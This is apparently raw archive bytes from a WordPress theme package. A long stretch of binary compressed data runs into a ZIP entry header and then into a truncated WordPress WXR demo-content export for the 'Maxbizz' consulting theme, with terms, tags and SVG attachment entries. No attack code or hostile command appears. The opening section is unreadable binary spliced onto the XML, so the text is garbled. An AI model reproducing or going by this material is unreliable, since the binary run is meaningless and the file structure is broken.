G���6lث�f͊�6lث�f͊�6#qwmk�bA��#�wc�lt7�0�nQ�ua�0;�US6lث�f͊�6lث�f�/�v��(�����r�=/��p�Z���t��qT�6lث�f͊�6lث�f͊�6��V�<_�?�}>$�IR��;��\ē���qUa�b���f�]�6lUٳf�]�6lUٳf�]�6lUٳf�]�6lUٳf�]�6lUٳf�]�6lUٳf�]�6lUٳf�]�6lUٳf�]�6lUٳf�]�6lU ֌�W�N	b�RJwY�|\/{�%����)�+�U՗�*�����U.�YB��z��F����ʓ��bX�p�=����$��F�>-�*�h��x��x��L}`�J�%?X�It��ӍG�kǶ�J˨��0�������=R��ŗS��(d���Jz�EZ�@>Xs�Km..�u����`QU�?~"W|2͛vlٱV/��j*��`FI�� �F�+ぼ�\_[-*�P�~\�gM��O������Wr	n" ^����>;�a��`�n"���*�Y��~�#�@�0_K-mĆ.	�FN�H	�AZ�>��v��(�y"�ne��$�b5j�nL[�d�6H�
g�,O���3�^�5���S���qp��S�Z0Y�ӯU�M�Isb�v�ځ��^�X�@l7����͊��o��iqy�OJ���f�X-���u+�F�4e#�}2ŕ��0�����zv���j|D4�ʟ�q!vi\��t��k�>��8�P�9�X�٩;b��@��(cRJ��0�]}�^[��C0��%�,KTR#���{�.�#+(�Q�Ÿ�$5>�8{��)�_�o�`�2��D��2r�������˛uΥ_��
z7:���6*����_[�!G
�U�ӈm�350Vlث�f͊�}m%S��q_E>��2z�u�ڸc�\\�pM�B�<)$�$nUjp��o�]�����Z���5*����E(��(�l6��Y�Z_5��X�T%YZsV
�i^?]�p���o[�9�`�#aR��S}���>Y(͊�4���9Z�#$_Z�m�`:��6*�ٳb��/;��<�����!dW��J�B>���R�}X�->��1����\��II��Yg`ΫO���?�d�ţi�j��q[��71��ժѥ8�+ǰ�0ڤ��5�oB[
ON��#i���*�,�ӗ�F��_�-2E���<�ȗ	j�
|,]KS�*�H�/��t��ڼ�4�͉&������K�NZ5 IB�r<>�@c^�/�^]�md"���<w���=܏%U�Tr�S��tl�ڼ�B�Ǜ��ʗ�W&;T����Q<��l��~�O��·�6v#v�5��nH���� o�v1lثb~�l�����#�F���!�*X1�o��UYK%�һB�l?X8aq��]�*��ʬG�*��J��UQEP(�¬~�-J�?s�b���@�r�?i��`�z�'���j*�SZ�j�
QS��*M�c���*F��r<�r�
}�}8߉w*V4@)@�?h�^U�Y�Wf͛vlٱWf͛vlٱWf͛vlٱWf͛vlٱWf͛vlٱWf͛vlٱWf͛vlٱWf͛vlٱWf͛vlٱWf͛vlٱWf͛vlٱWf͛vlٱWf͛vlٱWf͛vlٱWf͛vlٱWf͛vlٱWf͛vlٱWf͛vlٱWf͛vlٱWf͛vlٱWf͛vlٱWf͛vlٱWf͛vlٱWf͛vlٱWf͛vlٱWf͛vlٱWf͛vlٱWf͛vlٱWf͛vlٱWf͛vlٱWf͛vlٱWf͛vlٱWf͛vlٱWf͛vlٱWf͛vlٱWf͛vlٱWf͛vlٱWf͛vlٱWf͛vlٱWf͛vlٱWf͛vlٱWf͛vlٱWf͛vlٱWf͛vlٱWf͛vlٱWf͛vlٱWf͛vlٱWf͛vlٱWf͛vlٱWf͛��PK�8FZ�s���&inc/backend/data/main/demo-content.xmlnu�[���<?xml version="1.0" encoding="UTF-8" ?>
<!-- This is a WordPress eXtended RSS file generated by WordPress as an export of your site. -->
<!-- It contains information about your site's posts, pages, comments, categories, and other content. -->
<!-- You may use this file to transfer that content from one site to another. -->
<!-- This file is not intended to serve as a complete backup of your site. -->

<!-- To import this information into a WordPress site follow these steps: -->
<!-- 1. Log in to that site as an administrator. -->
<!-- 2. Go to Tools: Import in the WordPress admin panel. -->
<!-- 3. Install the "WordPress" importer from the list. -->
<!-- 4. Activate & Run Importer. -->
<!-- 5. Upload this file using the form provided on that page. -->
<!-- 6. You will first be asked to map the authors in this export file to users -->
<!--    on the site. For each author, you may choose to map to an -->
<!--    existing user on the site or to create a new user. -->
<!-- 7. WordPress will then import each of the posts, pages, comments, categories, etc. -->
<!--    contained in this file into your site. -->

	<!-- generator="WordPress/5.6" created="2020-12-25 06:48" -->
<rss version="2.0"
	xmlns:excerpt="http://wordpress.org/export/1.2/excerpt/"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:wp="http://wordpress.org/export/1.2/"
>

<channel>
	<title>Maxbizz</title>
	<link>http://wpdemo.archiwp.com/maxbizz</link>
	<description>Financial &#38; Consulting Demo WordPress Theme</description>
	<pubDate>Fri, 25 Dec 2020 06:48:58 +0000</pubDate>
	<language>en-US</language>
	<wp:wxr_version>1.2</wp:wxr_version>
	<wp:base_site_url>http://wpdemo.archiwp.com/</wp:base_site_url>
	<wp:base_blog_url>http://wpdemo.archiwp.com/maxbizz</wp:base_blog_url>

		<wp:author><wp:author_id>1</wp:author_id><wp:author_login><![CDATA[admin]]></wp:author_login><wp:author_email><![CDATA[support@oceanthemes.net]]></wp:author_email><wp:author_display_name><![CDATA[Tom Black]]></wp:author_display_name><wp:author_first_name><![CDATA[Tom]]></wp:author_first_name><wp:author_last_name><![CDATA[Black]]></wp:author_last_name></wp:author>

		<wp:category>
		<wp:term_id>3</wp:term_id>
		<wp:category_nicename><![CDATA[business]]></wp:category_nicename>
		<wp:category_parent><![CDATA[]]></wp:category_parent>
		<wp:cat_name><![CDATA[business]]></wp:cat_name>
	</wp:category>
		<wp:category>
		<wp:term_id>13</wp:term_id>
		<wp:category_nicename><![CDATA[consulting]]></wp:category_nicename>
		<wp:category_parent><![CDATA[]]></wp:category_parent>
		<wp:cat_name><![CDATA[consulting]]></wp:cat_name>
	</wp:category>
		<wp:category>
		<wp:term_id>14</wp:term_id>
		<wp:category_nicename><![CDATA[finance]]></wp:category_nicename>
		<wp:category_parent><![CDATA[]]></wp:category_parent>
		<wp:cat_name><![CDATA[finance]]></wp:cat_name>
	</wp:category>
		<wp:category>
		<wp:term_id>15</wp:term_id>
		<wp:category_nicename><![CDATA[marketing]]></wp:category_nicename>
		<wp:category_parent><![CDATA[]]></wp:category_parent>
		<wp:cat_name><![CDATA[marketing]]></wp:cat_name>
	</wp:category>
		<wp:category>
		<wp:term_id>1</wp:term_id>
		<wp:category_nicename><![CDATA[uncategorized]]></wp:category_nicename>
		<wp:category_parent><![CDATA[]]></wp:category_parent>
		<wp:cat_name><![CDATA[Uncategorized]]></wp:cat_name>
	</wp:category>
			<wp:tag>
		<wp:term_id>19</wp:term_id>
		<wp:tag_slug><![CDATA[analysis]]></wp:tag_slug>
		<wp:tag_name><![CDATA[analysis]]></wp:tag_name>
	</wp:tag>
		<wp:tag>
		<wp:term_id>5</wp:term_id>
		<wp:tag_slug><![CDATA[business]]></wp:tag_slug>
		<wp:tag_name><![CDATA[business]]></wp:tag_name>
	</wp:tag>
		<wp:tag>
		<wp:term_id>6</wp:term_id>
		<wp:tag_slug><![CDATA[consulting]]></wp:tag_slug>
		<wp:tag_name><![CDATA[consulting]]></wp:tag_name>
	</wp:tag>
		<wp:tag>
		<wp:term_id>18</wp:term_id>
		<wp:tag_slug><![CDATA[finance]]></wp:tag_slug>
		<wp:tag_name><![CDATA[finance]]></wp:tag_name>
	</wp:tag>
		<wp:tag>
		<wp:term_id>16</wp:term_id>
		<wp:tag_slug><![CDATA[marketing]]></wp:tag_slug>
		<wp:tag_name><![CDATA[marketing]]></wp:tag_name>
	</wp:tag>
		<wp:tag>
		<wp:term_id>21</wp:term_id>
		<wp:tag_slug><![CDATA[news]]></wp:tag_slug>
		<wp:tag_name><![CDATA[news]]></wp:tag_name>
	</wp:tag>
		<wp:tag>
		<wp:term_id>17</wp:term_id>
		<wp:tag_slug><![CDATA[strategy]]></wp:tag_slug>
		<wp:tag_name><![CDATA[strategy]]></wp:tag_name>
	</wp:tag>
		<wp:tag>
		<wp:term_id>7</wp:term_id>
		<wp:tag_slug><![CDATA[tips]]></wp:tag_slug>
		<wp:tag_name><![CDATA[tips]]></wp:tag_name>
	</wp:tag>
		<wp:tag>
		<wp:term_id>20</wp:term_id>
		<wp:tag_slug><![CDATA[trading]]></wp:tag_slug>
		<wp:tag_name><![CDATA[trading]]></wp:tag_name>
	</wp:tag>
			<wp:term>
		<wp:term_id>54</wp:term_id>
		<wp:term_taxonomy><![CDATA[product_tag]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[analysis]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[analysis]]></wp:term_name>
		<wp:termmeta>
			<wp:meta_key><![CDATA[product_count_product_tag]]></wp:meta_key>
			<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:termmeta>
	</wp:term>
		<wp:term>
		<wp:term_id>22</wp:term_id>
		<wp:term_taxonomy><![CDATA[portfolio_cat]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[business]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[business]]></wp:term_name>
	</wp:term>
		<wp:term>
		<wp:term_id>45</wp:term_id>
		<wp:term_taxonomy><![CDATA[product_cat]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[business]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[Business]]></wp:term_name>
		<wp:termmeta>
			<wp:meta_key><![CDATA[order]]></wp:meta_key>
			<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:termmeta>
		<wp:termmeta>
			<wp:meta_key><![CDATA[product_count_product_cat]]></wp:meta_key>
			<wp:meta_value><![CDATA[5]]></wp:meta_value>
		</wp:termmeta>
	</wp:term>
		<wp:term>
		<wp:term_id>49</wp:term_id>
		<wp:term_taxonomy><![CDATA[product_tag]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[business]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[business]]></wp:term_name>
		<wp:termmeta>
			<wp:meta_key><![CDATA[product_count_product_tag]]></wp:meta_key>
			<wp:meta_value><![CDATA[2]]></wp:meta_value>
		</wp:termmeta>
	</wp:term>
		<wp:term>
		<wp:term_id>48</wp:term_id>
		<wp:term_taxonomy><![CDATA[product_cat]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[consulting]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[Consulting]]></wp:term_name>
		<wp:termmeta>
			<wp:meta_key><![CDATA[order]]></wp:meta_key>
			<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:termmeta>
		<wp:termmeta>
			<wp:meta_key><![CDATA[product_count_product_cat]]></wp:meta_key>
			<wp:meta_value><![CDATA[5]]></wp:meta_value>
		</wp:termmeta>
	</wp:term>
		<wp:term>
		<wp:term_id>51</wp:term_id>
		<wp:term_taxonomy><![CDATA[product_tag]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[consulting]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[consulting]]></wp:term_name>
		<wp:termmeta>
			<wp:meta_key><![CDATA[product_count_product_tag]]></wp:meta_key>
			<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:termmeta>
	</wp:term>
		<wp:term>
		<wp:term_id>36</wp:term_id>
		<wp:term_taxonomy><![CDATA[product_visibility]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[exclude-from-catalog]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[exclude-from-catalog]]></wp:term_name>
	</wp:term>
		<wp:term>
		<wp:term_id>35</wp:term_id>
		<wp:term_taxonomy><![CDATA[product_visibility]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[exclude-from-search]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[exclude-from-search]]></wp:term_name>
	</wp:term>
		<wp:term>
		<wp:term_id>34</wp:term_id>
		<wp:term_taxonomy><![CDATA[product_type]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[external]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[external]]></wp:term_name>
	</wp:term>
		<wp:term>
		<wp:term_id>37</wp:term_id>
		<wp:term_taxonomy><![CDATA[product_visibility]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[featured]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[featured]]></wp:term_name>
	</wp:term>
		<wp:term>
		<wp:term_id>23</wp:term_id>
		<wp:term_taxonomy><![CDATA[portfolio_cat]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[finance]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[finance]]></wp:term_name>
	</wp:term>
		<wp:term>
		<wp:term_id>47</wp:term_id>
		<wp:term_taxonomy><![CDATA[product_cat]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[finance]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[Finance]]></wp:term_name>
		<wp:termmeta>
			<wp:meta_key><![CDATA[order]]></wp:meta_key>
			<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:termmeta>
		<wp:termmeta>
			<wp:meta_key><![CDATA[product_count_product_cat]]></wp:meta_key>
			<wp:meta_value><![CDATA[5]]></wp:meta_value>
		</wp:termmeta>
	</wp:term>
		<wp:term>
		<wp:term_id>53</wp:term_id>
		<wp:term_taxonomy><![CDATA[product_tag]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[finance]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[finance]]></wp:term_name>
		<wp:termmeta>
			<wp:meta_key><![CDATA[product_count_product_tag]]></wp:meta_key>
			<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:termmeta>
	</wp:term>
		<wp:term>
		<wp:term_id>32</wp:term_id>
		<wp:term_taxonomy><![CDATA[product_type]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[grouped]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[grouped]]></wp:term_name>
	</wp:term>
		<wp:term>
		<wp:term_id>29</wp:term_id>
		<wp:term_taxonomy><![CDATA[portfolio_cat]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[marketing]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[marketing]]></wp:term_name>
	</wp:term>
		<wp:term>
		<wp:term_id>46</wp:term_id>
		<wp:term_taxonomy><![CDATA[product_cat]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[marketing]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[Marketing]]></wp:term_name>
		<wp:termmeta>
			<wp:meta_key><![CDATA[order]]></wp:meta_key>
			<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:termmeta>
		<wp:termmeta>
			<wp:meta_key><![CDATA[product_count_product_cat]]></wp:meta_key>
			<wp:meta_value><![CDATA[5]]></wp:meta_value>
		</wp:termmeta>
	</wp:term>
		<wp:term>
		<wp:term_id>55</wp:term_id>
		<wp:term_taxonomy><![CDATA[product_tag]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[news]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[news]]></wp:term_name>
		<wp:termmeta>
			<wp:meta_key><![CDATA[product_count_product_tag]]></wp:meta_key>
			<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:termmeta>
	</wp:term>
		<wp:term>
		<wp:term_id>38</wp:term_id>
		<wp:term_taxonomy><![CDATA[product_visibility]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[outofstock]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[outofstock]]></wp:term_name>
	</wp:term>
		<wp:term>
		<wp:term_id>30</wp:term_id>
		<wp:term_taxonomy><![CDATA[elementor_library_type]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[page]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[page]]></wp:term_name>
	</wp:term>
		<wp:term>
		<wp:term_id>39</wp:term_id>
		<wp:term_taxonomy><![CDATA[product_visibility]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[rated-1]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[rated-1]]></wp:term_name>
	</wp:term>
		<wp:term>
		<wp:term_id>40</wp:term_id>
		<wp:term_taxonomy><![CDATA[product_visibility]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[rated-2]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[rated-2]]></wp:term_name>
	</wp:term>
		<wp:term>
		<wp:term_id>41</wp:term_id>
		<wp:term_taxonomy><![CDATA[product_visibility]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[rated-3]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[rated-3]]></wp:term_name>
	</wp:term>
		<wp:term>
		<wp:term_id>42</wp:term_id>
		<wp:term_taxonomy><![CDATA[product_visibility]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[rated-4]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[rated-4]]></wp:term_name>
	</wp:term>
		<wp:term>
		<wp:term_id>43</wp:term_id>
		<wp:term_taxonomy><![CDATA[product_visibility]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[rated-5]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[rated-5]]></wp:term_name>
	</wp:term>
		<wp:term>
		<wp:term_id>31</wp:term_id>
		<wp:term_taxonomy><![CDATA[product_type]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[simple]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[simple]]></wp:term_name>
	</wp:term>
		<wp:term>
		<wp:term_id>28</wp:term_id>
		<wp:term_taxonomy><![CDATA[portfolio_cat]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[startup]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[startup]]></wp:term_name>
	</wp:term>
		<wp:term>
		<wp:term_id>27</wp:term_id>
		<wp:term_taxonomy><![CDATA[portfolio_cat]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[strategy]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[strategy]]></wp:term_name>
	</wp:term>
		<wp:term>
		<wp:term_id>56</wp:term_id>
		<wp:term_taxonomy><![CDATA[product_tag]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[strategy]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[strategy]]></wp:term_name>
		<wp:termmeta>
			<wp:meta_key><![CDATA[product_count_product_tag]]></wp:meta_key>
			<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:termmeta>
	</wp:term>
		<wp:term>
		<wp:term_id>50</wp:term_id>
		<wp:term_taxonomy><![CDATA[product_tag]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[tips]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[tips]]></wp:term_name>
		<wp:termmeta>
			<wp:meta_key><![CDATA[product_count_product_tag]]></wp:meta_key>
			<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:termmeta>
	</wp:term>
		<wp:term>
		<wp:term_id>52</wp:term_id>
		<wp:term_taxonomy><![CDATA[product_tag]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[trading]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[trading]]></wp:term_name>
		<wp:termmeta>
			<wp:meta_key><![CDATA[product_count_product_tag]]></wp:meta_key>
			<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:termmeta>
	</wp:term>
		<wp:term>
		<wp:term_id>44</wp:term_id>
		<wp:term_taxonomy><![CDATA[product_cat]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[uncategorized]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[Uncategorized]]></wp:term_name>
	</wp:term>
		<wp:term>
		<wp:term_id>33</wp:term_id>
		<wp:term_taxonomy><![CDATA[product_type]]></wp:term_taxonomy>
		<wp:term_slug><![CDATA[variable]]></wp:term_slug>
		<wp:term_parent><![CDATA[]]></wp:term_parent>
		<wp:term_name><![CDATA[variable]]></wp:term_name>
	</wp:term>
			<wp:term><wp:term_id>2</wp:term_id><wp:term_taxonomy>nav_menu</wp:term_taxonomy><wp:term_slug><![CDATA[main-menu]]></wp:term_slug><wp:term_name><![CDATA[Main Menu]]></wp:term_name>
</wp:term>

	<generator>https://wordpress.org/?v=5.6</generator>

<image>
	<url>https://maxbizz.s3.amazonaws.com/images/cropped-favicon-32x32.png</url>
	<title>Maxbizz</title>
	<link>http://wpdemo.archiwp.com/maxbizz</link>
	<width>32</width>
	<height>32</height>
</image> 

		<item>
		<title>01_Black</title>
		<link>http://wpdemo.archiwp.com/maxbizz/ot_header_builders/header-1/01_black/</link>
		<pubDate>Thu, 03 Sep 2020 09:10:47 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/01_Black.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>334</wp:post_id>
		<wp:post_date><![CDATA[2020-09-03 09:10:47]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-03 09:10:47]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[01_black]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>7</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/01_Black.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/07/01_Black.svg]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>02_Black</title>
		<link>http://wpdemo.archiwp.com/maxbizz/ot_header_builders/header-2/02_black/</link>
		<pubDate>Thu, 03 Sep 2020 09:24:35 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/02_Black.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>350</wp:post_id>
		<wp:post_date><![CDATA[2020-09-03 09:24:35]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-03 09:24:35]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[02_black]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>106</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/02_Black.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/07/02_Black.svg]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>symbol</title>
		<link>http://wpdemo.archiwp.com/maxbizz/ot_header_builders/header-2/symbol/</link>
		<pubDate>Thu, 03 Sep 2020 09:34:24 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/symbol.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>356</wp:post_id>
		<wp:post_date><![CDATA[2020-09-03 09:34:24]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-03 09:34:24]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[symbol]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>106</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/symbol.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/07/symbol.svg]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>send</title>
		<link>http://wpdemo.archiwp.com/maxbizz/ot_header_builders/side-panel/send/</link>
		<pubDate>Thu, 03 Sep 2020 10:08:36 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/send.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>374</wp:post_id>
		<wp:post_date><![CDATA[2020-09-03 10:08:36]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-03 10:08:36]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[send]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>253</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/send.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/04/send.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m8.75 17.612v4.638c0 .324.208.611.516.713.077.025.156.037.234.037.234 0 .46-.11.604-.306l2.713-3.692z"></path><path d="m23.685.139c-.23-.163-.532-.185-.782-.054l-22.5 11.75c-.266.139-.423.423-.401.722.023.3.222.556.505.653l6.255 2.138 13.321-11.39-10.308 12.419 10.483 3.583c.078.026.16.04.242.04.136 0 .271-.037.39-.109.19-.116.319-.311.352-.53l2.75-18.5c.041-.28-.077-.558-.307-.722z"></path></svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>03_White</title>
		<link>http://wpdemo.archiwp.com/maxbizz/ot_header_builders/header-3/03_white/</link>
		<pubDate>Thu, 03 Sep 2020 10:09:43 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/03_White.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>377</wp:post_id>
		<wp:post_date><![CDATA[2020-09-03 10:09:43]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-03 10:09:43]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[03_white]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>182</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/03_White.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/07/03_White.svg]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>04_Black</title>
